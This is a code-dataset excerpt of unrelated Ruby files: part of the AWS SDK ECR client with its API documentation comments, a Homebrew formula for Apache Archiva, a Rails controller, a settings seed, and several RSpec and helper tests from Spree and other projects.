# image_tag_mutability: "MUTABLE", # required, accepts MUTABLE, IMMUTABLE
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.image_tag_mutability #=> String, one of "MUTABLE", "IMMUTABLE"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/PutImageTagMutability AWS API Documentation
#
# @overload put_image_tag_mutability(params = {})
# @param [Hash] params ({})
def put_image_tag_mutability(params = {}, options = {})
req = build_request(:put_image_tag_mutability, params)
req.send_request(options)
end
# Creates or updates the lifecycle policy for the specified repository.
# For more information, see [Lifecycle Policy Template][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/LifecyclePolicies.html
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
#   repository. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to receive the policy.
#
# @option params [required, String] :lifecycle_policy_text
#   The JSON lifecycle policy text to apply to the repository.
#
# @return [Types::PutLifecyclePolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PutLifecyclePolicyResponse#registry_id #registry_id} => String
# * {Types::PutLifecyclePolicyResponse#repository_name #repository_name} => String
# * {Types::PutLifecyclePolicyResponse#lifecycle_policy_text #lifecycle_policy_text} => String
#
# @example Request syntax with placeholder values
#
# resp = client.put_lifecycle_policy({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# lifecycle_policy_text: "LifecyclePolicyText", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.lifecycle_policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/PutLifecyclePolicy AWS API Documentation
#
# @overload put_lifecycle_policy(params = {})
# @param [Hash] params ({})
def put_lifecycle_policy(params = {}, options = {})
req = build_request(:put_lifecycle_policy, params)
req.send_request(options)
end
# Creates or updates the permissions policy for your registry.
#
# A registry policy is used to specify permissions for another AWS
# account and is used when configuring cross-account replication. For
# more information, see [Registry permissions][1] in the *Amazon Elastic
# Container Registry User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/registry-permissions.html
#
# @option params [required, String] :policy_text
# The JSON policy text to apply to your registry. The policy text
# follows the same format as IAM policy text. For more information, see
# [Registry permissions][1] in the *Amazon Elastic Container Registry
# User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/registry-permissions.html
#
# @return [Types::PutRegistryPolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PutRegistryPolicyResponse#registry_id #registry_id} => String
# * {Types::PutRegistryPolicyResponse#policy_text #policy_text} => String
#
# @example Request syntax with placeholder values
#
# resp = client.put_registry_policy({
# policy_text: "RegistryPolicyText", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/PutRegistryPolicy AWS API Documentation
#
# @overload put_registry_policy(params = {})
# @param [Hash] params ({})
def put_registry_policy(params = {}, options = {})
req = build_request(:put_registry_policy, params)
req.send_request(options)
end
# Creates or updates the replication configuration for a registry. The
# existing replication configuration for a repository can be retrieved
# with the DescribeRegistry API action. The first time the
# PutReplicationConfiguration API is called, a service-linked IAM role
# is created in your account for the replication process. For more
# information, see [Using Service-Linked Roles for Amazon ECR][1] in the
# *Amazon Elastic Container Registry User Guide*.
#
# <note markdown="1"> When configuring cross-account replication, the destination account
# must grant the source account permission to replicate. This permission
# is controlled using a registry permissions policy. For more
# information, see PutRegistryPolicy.
#
# </note>
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/using-service-linked-roles.html
#
# @option params [required, Types::ReplicationConfiguration] :replication_configuration
# An object representing the replication configuration for a registry.
#
# @return [Types::PutReplicationConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PutReplicationConfigurationResponse#replication_configuration #replication_configuration} => Types::ReplicationConfiguration
#
# @example Request syntax with placeholder values
#
# resp = client.put_replication_configuration({
# replication_configuration: { # required
# rules: [ # required
# {
# destinations: [ # required
# {
# region: "Region", # required
# registry_id: "RegistryId", # required
# },
# ],
# },
# ],
# },
# })
#
# @example Response structure
#
# resp.replication_configuration.rules #=> Array
# resp.replication_configuration.rules[0].destinations #=> Array
# resp.replication_configuration.rules[0].destinations[0].region #=> String
# resp.replication_configuration.rules[0].destinations[0].registry_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/PutReplicationConfiguration AWS API Documentation
#
# @overload put_replication_configuration(params = {})
# @param [Hash] params ({})
def put_replication_configuration(params = {}, options = {})
req = build_request(:put_replication_configuration, params)
req.send_request(options)
end
# Applies a repository policy to the specified repository to control
# access permissions. For more information, see [Amazon ECR Repository
# Policies][1] in the *Amazon Elastic Container Registry User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/repository-policies.html
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to receive the policy.
#
# @option params [required, String] :policy_text
# The JSON repository policy text to apply to the repository. For more
# information, see [Amazon ECR Repository Policies][1] in the *Amazon
# Elastic Container Registry User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/repository-policy-examples.html
#
# @option params [Boolean] :force
#   If the policy you are attempting to set on a repository would prevent
#   you from setting another policy in the future, you must force the
#   SetRepositoryPolicy operation. This is intended to prevent accidental
#   repository lockouts.
#
# @return [Types::SetRepositoryPolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::SetRepositoryPolicyResponse#registry_id #registry_id} => String
# * {Types::SetRepositoryPolicyResponse#repository_name #repository_name} => String
# * {Types::SetRepositoryPolicyResponse#policy_text #policy_text} => String
#
# @example Request syntax with placeholder values
#
# resp = client.set_repository_policy({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# policy_text: "RepositoryPolicyText", # required
# force: false,
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/SetRepositoryPolicy AWS API Documentation
#
# @overload set_repository_policy(params = {})
# @param [Hash] params ({})
def set_repository_policy(params = {}, options = {})
req = build_request(:set_repository_policy, params)
req.send_request(options)
end
# Starts an image vulnerability scan. An image scan can only be started
# once per day on an individual image. This limit includes if an image
# was scanned on initial push. For more information, see [Image
# Scanning][1] in the *Amazon Elastic Container Registry User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-scanning.html
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository in which to start an image scan request. If you do not
# specify a registry, the default registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository that contains the images to scan.
#
# @option params [required, Types::ImageIdentifier] :image_id
# An object with identifying information for an Amazon ECR image.
#
# @return [Types::StartImageScanResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::StartImageScanResponse#registry_id #registry_id} => String
# * {Types::StartImageScanResponse#repository_name #repository_name} => String
# * {Types::StartImageScanResponse#image_id #image_id} => Types::ImageIdentifier
# * {Types::StartImageScanResponse#image_scan_status #image_scan_status} => Types::ImageScanStatus
#
# @example Request syntax with placeholder values
#
# resp = client.start_image_scan({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_id: { # required
# image_digest: "ImageDigest",
# image_tag: "ImageTag",
# },
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.image_id.image_digest #=> String
# resp.image_id.image_tag #=> String
# resp.image_scan_status.status #=> String, one of "IN_PROGRESS", "COMPLETE", "FAILED"
# resp.image_scan_status.description #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/StartImageScan AWS API Documentation
#
# @overload start_image_scan(params = {})
# @param [Hash] params ({})
def start_image_scan(params = {}, options = {})
req = build_request(:start_image_scan, params)
req.send_request(options)
end
# Starts a preview of a lifecycle policy for the specified repository.
# This allows you to see the results before associating the lifecycle
# policy with the repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to be evaluated.
#
# @option params [String] :lifecycle_policy_text
# The policy to be evaluated against. If you do not specify a policy,
# the current policy for the repository is used.
#
# @return [Types::StartLifecyclePolicyPreviewResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::StartLifecyclePolicyPreviewResponse#registry_id #registry_id} => String
# * {Types::StartLifecyclePolicyPreviewResponse#repository_name #repository_name} => String
# * {Types::StartLifecyclePolicyPreviewResponse#lifecycle_policy_text #lifecycle_policy_text} => String
# * {Types::StartLifecyclePolicyPreviewResponse#status #status} => String
#
# @example Request syntax with placeholder values
#
# resp = client.start_lifecycle_policy_preview({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# lifecycle_policy_text: "LifecyclePolicyText",
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.lifecycle_policy_text #=> String
# resp.status #=> String, one of "IN_PROGRESS", "COMPLETE", "EXPIRED", "FAILED"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/StartLifecyclePolicyPreview AWS API Documentation
#
# @overload start_lifecycle_policy_preview(params = {})
# @param [Hash] params ({})
def start_lifecycle_policy_preview(params = {}, options = {})
req = build_request(:start_lifecycle_policy_preview, params)
req.send_request(options)
end
# Adds specified tags to a resource with the specified ARN. Existing
# tags on a resource are not changed if they are not specified in the
# request parameters.
#
# @option params [required, String] :resource_arn
    #   The Amazon Resource Name (ARN) of the resource to which to add
    #   tags. Currently, the only supported resource is an Amazon ECR
    #   repository.
#
# @option params [required, Array<Types::Tag>] :tags
# The tags to add to the resource. A tag is an array of key-value pairs.
# Tag keys can have a maximum character length of 128 characters, and
# tag values can have a maximum length of 256 characters.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.tag_resource({
# resource_arn: "Arn", # required
# tags: [ # required
# {
# key: "TagKey",
# value: "TagValue",
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/TagResource AWS API Documentation
#
# @overload tag_resource(params = {})
# @param [Hash] params ({})
def tag_resource(params = {}, options = {})
req = build_request(:tag_resource, params)
req.send_request(options)
end
# Deletes specified tags from a resource.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the resource from which to remove
# tags. Currently, the only supported resource is an Amazon ECR
# repository.
#
# @option params [required, Array<String>] :tag_keys
# The keys of the tags to be removed.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.untag_resource({
# resource_arn: "Arn", # required
# tag_keys: ["TagKey"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/UntagResource AWS API Documentation
#
# @overload untag_resource(params = {})
# @param [Hash] params ({})
def untag_resource(params = {}, options = {})
req = build_request(:untag_resource, params)
req.send_request(options)
end
# Uploads an image layer part to Amazon ECR.
#
# When an image is pushed, each new image layer is uploaded in parts.
# The maximum size of each image layer part can be 20971520 bytes (or
# about 20MB). The UploadLayerPart API is called once per each new image
# layer part.
#
# <note markdown="1"> This operation is used by the Amazon ECR proxy and is not generally
# used by customers for pulling and pushing images. In most cases, you
# should use the `docker` CLI to pull, tag, and push images.
#
# </note>
#
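    # As a minimal sketch of how this call fits into a full layer upload
    # (the repository name, file name, and digest below are illustrative
    # placeholders, not values from this documentation), a single-part
    # upload might look like:
    #
    #     upload = client.initiate_layer_upload(repository_name: "my-repo")
    #     blob = File.binread("layer.tar.gz") # assumed local layer blob
    #     client.upload_layer_part(
    #       repository_name: "my-repo",
    #       upload_id: upload.upload_id,
    #       part_first_byte: 0,
    #       part_last_byte: blob.bytesize - 1,
    #       layer_part_blob: blob,
    #     )
    #     client.complete_layer_upload(
    #       repository_name: "my-repo",
    #       upload_id: upload.upload_id,
    #       layer_digests: ["sha256:..."], # digest of the uploaded blob
    #     )
    #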
# @option params [String] :registry_id
# The AWS account ID associated with the registry to which you are
# uploading layer parts. If you do not specify a registry, the default
# registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to which you are uploading layer parts.
#
# @option params [required, String] :upload_id
# The upload ID from a previous InitiateLayerUpload operation to
# associate with the layer part upload.
#
# @option params [required, Integer] :part_first_byte
    #   The position of the first byte of the layer part within the overall
    #   image layer.
#
# @option params [required, Integer] :part_last_byte
# The position of the last byte of the layer part within the overall
# image layer.
#
# @option params [required, String, StringIO, File] :layer_part_blob
# The base64-encoded layer part payload.
#
# @return [Types::UploadLayerPartResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UploadLayerPartResponse#registry_id #registry_id} => String
# * {Types::UploadLayerPartResponse#repository_name #repository_name} => String
# * {Types::UploadLayerPartResponse#upload_id #upload_id} => String
# * {Types::UploadLayerPartResponse#last_byte_received #last_byte_received} => Integer
#
# @example Request syntax with placeholder values
#
# resp = client.upload_layer_part({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# upload_id: "UploadId", # required
# part_first_byte: 1, # required
# part_last_byte: 1, # required
# layer_part_blob: "data", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.upload_id #=> String
# resp.last_byte_received #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/UploadLayerPart AWS API Documentation
#
# @overload upload_layer_part(params = {})
# @param [Hash] params ({})
def upload_layer_part(params = {}, options = {})
req = build_request(:upload_layer_part, params)
req.send_request(options)
end
# @!endgroup
# @param params ({})
# @api private
def build_request(operation_name, params = {})
handlers = @handlers.for(operation_name)
context = Seahorse::Client::RequestContext.new(
operation_name: operation_name,
operation: config.api.operation(operation_name),
client: self,
params: params,
config: config)
context[:gem_name] = 'aws-sdk-ecr'
context[:gem_version] = '1.40.0'
Seahorse::Client::Request.new(handlers, context)
end
# Polls an API operation until a resource enters a desired state.
#
# ## Basic Usage
#
# A waiter will call an API operation until:
#
# * It is successful
# * It enters a terminal state
# * It makes the maximum number of attempts
#
# In between attempts, the waiter will sleep.
#
# # polls in a loop, sleeping between attempts
# client.wait_until(waiter_name, params)
#
# ## Configuration
#
# You can configure the maximum number of polling attempts, and the
# delay (in seconds) between each polling attempt. You can pass
# configuration as the final arguments hash.
#
# # poll for ~25 seconds
# client.wait_until(waiter_name, params, {
# max_attempts: 5,
# delay: 5,
# })
#
# ## Callbacks
#
# You can be notified before each polling attempt and before each
# delay. If you throw `:success` or `:failure` from these callbacks,
# it will terminate the waiter.
#
# started_at = Time.now
# client.wait_until(waiter_name, params, {
#
# # disable max attempts
# max_attempts: nil,
#
# # poll for 1 hour, instead of a number of attempts
# before_wait: -> (attempts, response) do
# throw :failure if Time.now - started_at > 3600
# end
# })
#
# ## Handling Errors
#
# When a waiter is unsuccessful, it will raise an error.
# All of the failure errors extend from
# {Aws::Waiters::Errors::WaiterFailed}.
#
# begin
# client.wait_until(...)
# rescue Aws::Waiters::Errors::WaiterFailed
# # resource did not enter the desired state in time
# end
#
# ## Valid Waiters
#
# The following table lists the valid waiter names, the operations they call,
# and the default `:delay` and `:max_attempts` values.
#
# | waiter_name | params | :delay | :max_attempts |
# | --------------------------------- | ------------------------------------- | -------- | ------------- |
# | image_scan_complete | {Client#describe_image_scan_findings} | 5 | 60 |
# | lifecycle_policy_preview_complete | {Client#get_lifecycle_policy_preview} | 5 | 20 |
#
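    # For example, a minimal sketch using the image scan waiter above (the
    # repository name and image tag are placeholder values, not part of
    # this documentation):
    #
    #     client.wait_until(:image_scan_complete,
    #       repository_name: "my-repo",
    #       image_id: { image_tag: "latest" },
    #     )
    #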
# @raise [Errors::FailureStateError] Raised when the waiter terminates
# because the waiter has entered a state that it will not transition
# out of, preventing success.
#
# @raise [Errors::TooManyAttemptsError] Raised when the configured
# maximum number of attempts have been made, and the waiter is not
# yet successful.
#
    # @raise [Errors::UnexpectedError] Raised when an error is encountered
    #   while polling for a resource that is not expected.
#
# @raise [Errors::NoSuchWaiterError] Raised when you request to wait
# for an unknown state.
#
# @return [Boolean] Returns `true` if the waiter was successful.
# @param [Symbol] waiter_name
# @param [Hash] params ({})
# @param [Hash] options ({})
# @option options [Integer] :max_attempts
# @option options [Integer] :delay
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
def wait_until(waiter_name, params = {}, options = {})
w = waiter(waiter_name, options)
yield(w.waiter) if block_given? # deprecated
w.wait(params)
end
# @api private
# @deprecated
def waiter_names
waiters.keys
end
private
# @param [Symbol] waiter_name
# @param [Hash] options ({})
def waiter(waiter_name, options = {})
waiter_class = waiters[waiter_name]
if waiter_class
waiter_class.new(options.merge(client: self))
else
raise Aws::Waiters::Errors::NoSuchWaiterError.new(waiter_name, waiters.keys)
end
end
def waiters
{
image_scan_complete: Waiters::ImageScanComplete,
lifecycle_policy_preview_complete: Waiters::LifecyclePolicyPreviewComplete
}
end
class << self
# @api private
attr_reader :identifier
# @api private
def errors_module
Errors
end
end
end
end
| 43.216344 | 362 | 0.662675 |
0161f8e6d21afd3fa769541735a201a58cc65f2d | 118 | class Object
  # Autoload a missing constant by requiring a file named after the
  # underscored constant name (e.g. FooBar => "foo_bar").
  def self.const_missing(c)
require Rulerss.to_underscore(c.to_s)
Object.const_get(c)
end
end
| 16.857143 | 41 | 0.728814 |
e29c2cd42fe761aa63f5cdd156b1d48105829d9a | 1,005 | class ApacheArchiva < Formula
desc "Build Artifact Repository Manager"
homepage "https://archiva.apache.org/"
url "https://www.apache.org/dyn/closer.lua?path=archiva/2.2.5/binaries/apache-archiva-2.2.5-bin.tar.gz"
mirror "https://archive.apache.org/dist/archiva/2.2.5/binaries/apache-archiva-2.2.5-bin.tar.gz"
sha256 "01119af2d9950eacbcce0b7f8db5067b166ad26c1e1701bef829105441bb6e29"
license "Apache-2.0"
depends_on "openjdk"
def install
libexec.install Dir["*"]
(bin/"archiva").write_env_script libexec/"bin/archiva", JAVA_HOME: Formula["openjdk"].opt_prefix
end
def post_install
(var/"archiva/logs").mkpath
(var/"archiva/data").mkpath
(var/"archiva/temp").mkpath
cp_r libexec/"conf", var/"archiva"
end
service do
run [opt_bin/"archiva", "console"]
environment_variables ARCHIVA_BASE: var/"archiva"
log_path var/"archiva/logs/launchd.log"
end
test do
assert_match "was not running.", shell_output("#{bin}/archiva stop")
end
end
| 29.558824 | 105 | 0.720398 |
eda676262fc023c4a18939ada4157dd9e55170d0 | 495 | require 'test_helper'
class SubscriptionsHelperTest < ActionView::TestCase
include SubscriptionsHelper
test 'expiration_month_options' do
assert_not_nil expiration_month_options
end
test 'expiration_year_options' do
assert_not_nil expiration_year_options
end
test "format_monthly_amount" do
free_amount = format_monthly_amount(0)
assert_equal "Free!", free_amount
ten_a_month = format_monthly_amount(1000)
assert_equal "$10/month", ten_a_month
end
end
| 22.5 | 52 | 0.785859 |
ed66190bddbe7a0dd1f298c61b25ea48d2096fe4 | 1,282 | class ProposalsController < ApplicationController
expose(:talk) { build_talk }
expose(:speaker) { talk.speakers.first }
expose(:format) { params[:format] || params[:proposal][:format] }
expose(:proposal) { Proposal.new :format => format, :talk => talk }
expose(:tracks) { Track.current_year }
expose(:video_approvals) { Talk.video_approvals }
expose(:durations) { Talk.talk_durations }
def new
if RefinerySetting.find_or_set("#{format}_proposals_accepted".to_sym, 'true') == true
render "new_#{format}"
else
render "cfp_expired"
end
end
def create
if talk.save
Proposal.create :status => 'submitted', :talk => talk, :format => format
email_method = format == 'workshop' ? 'workshop_submission_email' : 'talk_submission_email'
SpeakerMailer.send(email_method, talk).deliver
render "create_#{format}"
else
render "new_#{format}"
end
end
private
def build_talk
return Talk.new(:speakers => [Speaker.new]) if params[:proposal].nil?
image_param = params[:proposal][:talk_attributes][:speakers_attributes]["0"].delete(:image)
image = Image.new(image_param) if image_param
Talk.new(params[:proposal][:talk_attributes]).tap{|t| t.speakers.first.image = image if image}
end
end
| 34.648649 | 98 | 0.687988 |
4a0752d70d411b3e7f8a58b443f18abfb78e407c | 884 | User.find(:all).each do |user|
user.plugins.create(:name => "campaigns",
:position => (user.plugins.maximum(:position) || -1) +1)
end
RefinerySetting.create :name => Refinery::Mailchimp::API::KeySetting[:name], :value => Refinery::Mailchimp::API::KeySetting[:default], :restricted => true
RefinerySetting.create :name => Refinery::Mailchimp::API::DefaultFromNameSetting[:name], :value => Refinery::Mailchimp::API::DefaultFromNameSetting[:default], :restricted => true
RefinerySetting.create :name => Refinery::Mailchimp::API::DefaultFromEmailSetting[:name], :value => Refinery::Mailchimp::API::DefaultFromEmailSetting[:default], :restricted => true
RefinerySetting.create :name => Refinery::Mailchimp::API::DefaultToNameSetting[:name], :value => Refinery::Mailchimp::API::DefaultToNameSetting[:default], :restricted => true
| 80.363636 | 180 | 0.701357 |
b9e7d380b292909331d4c04db6a9bd41df4510e5 | 29,455 | # frozen_string_literal: true
require 'rails_helper'
require 'benchmark'
RSpec.describe Spree::Shipment, type: :model do
let(:order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:shipping_method) { create(:shipping_method, name: "UPS") }
let(:stock_location) { create(:stock_location) }
let(:shipment) do
order.shipments.create!(
state: 'pending',
cost: 1,
inventory_units: order.inventory_units,
shipping_rates: [shipping_rate],
stock_location: stock_location
)
end
let(:shipping_rate) do
Spree::ShippingRate.create!(
shipping_method: shipping_method,
selected: true
)
end
let(:variant) { mock_model(Spree::Variant) }
let(:line_item) { mock_model(Spree::LineItem, variant: variant) }
context '#transfer_to_location' do
it 'transfers unit to a new shipment with given location' do
order = create(:completed_order_with_totals, line_items_count: 2)
shipment = order.shipments.first
variant = order.inventory_units.map(&:variant).first
aggregate_failures("verifying new shipment attributes") do
expect do
Spree::Deprecation.silence do
shipment.transfer_to_location(variant, 1, stock_location)
end
end.to change { Spree::Shipment.count }.by(1)
new_shipment = order.shipments.last
expect(new_shipment.number).to_not eq(shipment.number)
expect(new_shipment.stock_location).to eq(stock_location)
expect(new_shipment.line_items.count).to eq(1)
expect(new_shipment.line_items.first.variant).to eq(variant)
end
end
end
# Regression test for https://github.com/spree/spree/issues/4063
context "number generation" do
before { allow(order).to receive :update! }
it "generates a number containing a letter + 11 numbers" do
shipment.save
expect(shipment.number[0]).to eq("H")
expect(/\d{11}/.match(shipment.number)).not_to be_nil
expect(shipment.number.length).to eq(12)
end
end
  it 'is backordered if one of its inventory_units is backordered' do
shipment.inventory_units = [
build(:inventory_unit, state: 'backordered', shipment: nil),
build(:inventory_unit, state: 'shipped', shipment: nil)
]
expect(shipment).to be_backordered
end
context '#determine_state' do
it 'returns canceled if order is canceled?' do
allow(order).to receive_messages canceled?: true
expect(shipment.determine_state(order)).to eq 'canceled'
end
it 'returns pending unless order.can_ship?' do
allow(order).to receive_messages can_ship?: false
expect(shipment.determine_state(order)).to eq 'pending'
end
it 'returns pending if backordered' do
allow(shipment).to receive_messages inventory_units: [mock_model(Spree::InventoryUnit, allow_ship?: false, canceled?: false)]
expect(shipment.determine_state(order)).to eq 'pending'
end
it 'returns shipped when already shipped' do
allow(shipment).to receive_messages state: 'shipped'
expect(shipment.determine_state(order)).to eq 'shipped'
end
it 'returns pending when unpaid' do
allow(order).to receive_messages paid?: false
expect(shipment.determine_state(order)).to eq 'pending'
end
it 'returns ready when paid' do
allow(order).to receive_messages paid?: true
expect(shipment.determine_state(order)).to eq 'ready'
end
end
context "display_amount" do
it "retuns a Spree::Money" do
shipment.cost = 21.22
expect(shipment.display_amount).to eq(Spree::Money.new(21.22))
end
end
context "display_total" do
it "retuns a Spree::Money" do
allow(shipment).to receive(:total) { 21.22 }
expect(shipment.display_total).to eq(Spree::Money.new(21.22))
end
end
context "display_item_cost" do
it "retuns a Spree::Money" do
allow(shipment).to receive(:item_cost) { 21.22 }
expect(shipment.display_item_cost).to eq(Spree::Money.new(21.22))
end
end
context "#item_cost" do
let(:shipment) { order.shipments[0] }
let(:order) do
create(
:order_ready_to_ship,
line_items_attributes: [{ price: 10, variant: variant }],
ship_address: ship_address,
)
end
let!(:ship_address) { create(:address) }
let!(:tax_zone) { create(:global_zone) } # will include the above address
let!(:tax_rate) { create(:tax_rate, amount: 0.1, zone: tax_zone, tax_categories: [tax_category]) }
let(:tax_category) { create(:tax_category) }
let(:variant) { create(:variant, tax_category: tax_category) }
    it "should equal the line item's final amount with tax" do
expect(shipment.item_cost).to eql(11.0)
end
end
it "#discounted_cost" do
shipment = create(:shipment)
shipment.cost = 10
shipment.promo_total = -1
expect(Spree::Deprecation.silence { shipment.discounted_cost }).to eq(9)
end
describe '#total_before_tax' do
before do
shipment.update_attributes!(cost: 10)
end
let!(:admin_adjustment) { create(:adjustment, adjustable: shipment, order: shipment.order, amount: -1, source: nil) }
let!(:promo_adjustment) { create(:adjustment, adjustable: shipment, order: shipment.order, amount: -2, source: promo_action) }
let!(:ineligible_promo_adjustment) { create(:adjustment, eligible: false, adjustable: shipment, order: shipment.order, amount: -4, source: promo_action) }
let(:promo_action) { promo.actions[0] }
let(:promo) { create(:promotion, :with_line_item_adjustment) }
it 'returns the amount minus any adjustments' do
expect(shipment.total_before_tax).to eq(10 - 1 - 2)
end
end
it "#tax_total with included taxes" do
shipment = Spree::Shipment.new
expect(shipment.tax_total).to eq(0)
shipment.included_tax_total = 10
expect(shipment.tax_total).to eq(10)
end
it "#tax_total with additional taxes" do
shipment = Spree::Shipment.new
expect(shipment.tax_total).to eq(0)
shipment.additional_tax_total = 10
expect(shipment.tax_total).to eq(10)
end
it "#total" do
shipment = Spree::Shipment.new
shipment.cost = 10
shipment.adjustment_total = -2
shipment.included_tax_total = 1
expect(shipment.total).to eq(8)
end
context "manifest" do
let(:order) { create(:order) }
let(:variant) { create(:variant) }
let!(:line_item) { order.contents.add variant }
let!(:shipment) { order.create_proposed_shipments.first }
it "returns variant expected" do
expect(shipment.manifest.first.variant).to eq variant
end
context "variant was removed" do
before { variant.discard }
it "still returns variant expected" do
expect(shipment.manifest.first.variant).to eq variant
end
end
end
context 'shipping_rates' do
let(:shipment) { create(:shipment) }
let(:shipping_method1) { create(:shipping_method) }
let(:shipping_method2) { create(:shipping_method) }
let(:shipping_rates) {
[
Spree::ShippingRate.new(shipping_method: shipping_method1, cost: 10.00, selected: true),
Spree::ShippingRate.new(shipping_method: shipping_method2, cost: 20.00)
]
}
it 'returns shipping_method from selected shipping_rate' do
shipment.shipping_rates.delete_all
shipment.shipping_rates.create shipping_method: shipping_method1, cost: 10.00, selected: true
expect(shipment.shipping_method).to eq shipping_method1
end
context 'refresh_rates' do
let(:mock_estimator) { double('estimator', shipping_rates: shipping_rates) }
before { allow(shipment).to receive(:can_get_rates?){ true } }
it 'should request new rates, and maintain shipping_method selection' do
expect(Spree::Stock::Estimator).to receive(:new).with(no_args).and_return(mock_estimator)
allow(shipment).to receive_messages(shipping_method: shipping_method2)
expect(shipment.refresh_rates).to eq(shipping_rates)
expect(shipment.reload.selected_shipping_rate.shipping_method_id).to eq(shipping_method2.id)
end
it 'should handle no shipping_method selection' do
expect(Spree::Stock::Estimator).to receive(:new).with(no_args).and_return(mock_estimator)
allow(shipment).to receive_messages(shipping_method: nil)
expect(shipment.refresh_rates).to eq(shipping_rates)
expect(shipment.reload.selected_shipping_rate).not_to be_nil
end
it 'should not refresh if shipment is shipped' do
expect(Spree::Stock::Estimator).not_to receive(:new)
shipment.shipping_rates.delete_all
allow(shipment).to receive_messages(shipped?: true)
expect(shipment.refresh_rates).to eq([])
end
it "can't get rates without a shipping address" do
shipment.order.update_attributes!(ship_address: nil)
expect(shipment.refresh_rates).to eq([])
end
it 'uses the pluggable estimator class' do
expect(Spree::Config.stock).to receive(:estimator_class).and_call_original
shipment.refresh_rates
end
context 'to_package' do
let(:inventory_units) do
[build(:inventory_unit, line_item: line_item, variant: variant, state: 'on_hand'),
build(:inventory_unit, line_item: line_item, variant: variant, state: 'backordered')]
end
before do
allow(line_item).to receive(:order) { order }
allow(shipment).to receive(:inventory_units) { inventory_units }
allow(inventory_units).to receive_message_chain(:includes, :joins).and_return inventory_units
end
it 'should use symbols for states when adding contents to package' do
package = shipment.to_package
expect(package.on_hand.count).to eq 1
expect(package.backordered.count).to eq 1
end
it 'should set the shipment to itself' do
expect(shipment.to_package.shipment).to eq(shipment)
end
end
end
end
context "#update_state" do
shared_examples_for "immutable once shipped" do
before { shipment.update_columns(state: 'shipped') }
it "should remain in shipped state once shipped" do
expect {
shipment.update_state
}.not_to change { shipment.state }
end
end
shared_examples_for "pending if backordered" do
it "should have a state of pending if backordered" do
# Set as ready so we can test for change
shipment.update_attributes!(state: 'ready')
allow(shipment).to receive_messages(inventory_units: [mock_model(Spree::InventoryUnit, allow_ship?: false, canceled?: false)])
expect(shipment).to receive(:update_columns).with(state: 'pending', updated_at: kind_of(Time))
shipment.update_state
end
end
context "when order cannot ship" do
before { allow(order).to receive_messages can_ship?: false }
it "should result in a 'pending' state" do
# Set as ready so we can test for change
shipment.update_attributes!(state: 'ready')
expect(shipment).to receive(:update_columns).with(state: 'pending', updated_at: kind_of(Time))
shipment.update_state
end
end
context "when order is paid" do
before { allow(order).to receive_messages paid?: true }
it "should result in a 'ready' state" do
expect(shipment).to receive(:update_columns).with(state: 'ready', updated_at: kind_of(Time))
shipment.update_state
end
